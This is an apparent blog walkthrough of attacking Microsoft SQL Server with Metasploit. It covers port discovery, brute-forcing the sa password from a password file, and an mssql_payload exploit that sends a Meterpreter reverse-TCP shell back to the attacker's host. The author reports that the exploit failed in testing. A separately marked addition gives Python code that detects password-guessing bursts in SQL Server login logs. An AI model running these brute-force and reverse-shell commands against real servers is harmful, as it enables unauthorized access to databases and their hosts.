Attacking SQL Server

Author: Instu | Published: 2017-05-03 11:41

    First, query UDP port 1434 to find the dynamic TCP port of the SQL Server service.

    msf > use auxiliary/scanner/mssql/mssql_ping

    msf auxiliary(mssql_ping) > set rhosts 192.168.80.33

    msf auxiliary(mssql_ping) > set threads 16

    msf auxiliary(mssql_ping) > exploit


    Next, brute-force the password of the sa user.

    msf auxiliary(mssql_ping) > use auxiliary/scanner/mssql/mssql_login

    msf auxiliary(mssql_login) > set rhosts 192.168.80.33

    msf auxiliary(mssql_login) > set username sa

    msf auxiliary(mssql_login) > set pass_file /root/1.txt

    msf auxiliary(mssql_login) > exploit


    xp_cmdshell

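    When working with MSSQL as the sa user, the xp_cmdshell stored procedure can be executed. This stored procedure allows direct interaction with the operating system and execution of commands.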

    msf auxiliary(mssql_login) > use exploit/windows/mssql/mssql_payload

    msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp

    msf exploit(mssql_payload) > set lhost 192.168.80.163

    msf exploit(mssql_payload) > set rhost 192.168.80.33

    msf exploit(mssql_payload) > set password 123456

    msf exploit(mssql_payload) > exploit

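    After a successful exploit, you get a meterpreter shell on the target host. However, I did not get this to work in my test; after the Stage upload completed, the following message was shown.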

    [*] Exploit completed, but no session was created.
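
A defender's view of the password-guessing step against sa, as an added example that is not part of the original post: the Python function below reads SQL Server error-log login audit lines and flags a client that fails the same login repeatedly inside a short window, plus a successful login that follows such a burst. The log lines are constructed, and the function name, threshold and window are assumptions; it also assumes login auditing records both failed and successful logins.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of SQL Server ERRORLOG lines (not taken from the post);
# the addresses reuse the lab IPs shown in the commands above.
SAMPLE_LOG = """\
2024-01-15 09:00:01.10 Logon       Error: 18456, Severity: 14, State: 8.
2024-01-15 09:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.80.163]
2024-01-15 09:00:02.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.80.163]
2024-01-15 09:00:03.05 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.80.163]
2024-01-15 09:00:03.40 Logon       Login failed for user 'app'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.80.10]
2024-01-15 09:00:04.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.80.163]
2024-01-15 09:00:05.27 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.80.163]
2024-01-15 09:00:06.02 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.80.163]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'"
    r".*\[CLIENT: (?P<client>[^\]]+)\]"
)

def detect_password_guessing(log_text, threshold=5, window_seconds=60):
    """Return (kind, client, user) alerts; threshold and window are assumed defaults."""
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)  # (client, user) -> timestamps of recent failures
    flagged = set()                # pairs that already raised a "guessing" alert
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skips "Error: 18456, Severity: ..." and unrelated lines
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        key = (m["client"], m["user"])
        recent = failures[key]
        while recent and ts - recent[0] > window:
            recent.popleft()  # drop failures that fell out of the window
        if m["result"] == "failed":
            recent.append(ts)
            if len(recent) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("guessing", *key))
        elif key in flagged:  # success right after a flagged burst
            alerts.append(("success_after_guessing", *key))
            flagged.discard(key)
    return alerts
```

A `success_after_guessing` alert for sa is the one to triage first, since it means the guessed password worked and xp_cmdshell is then within reach of that client.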
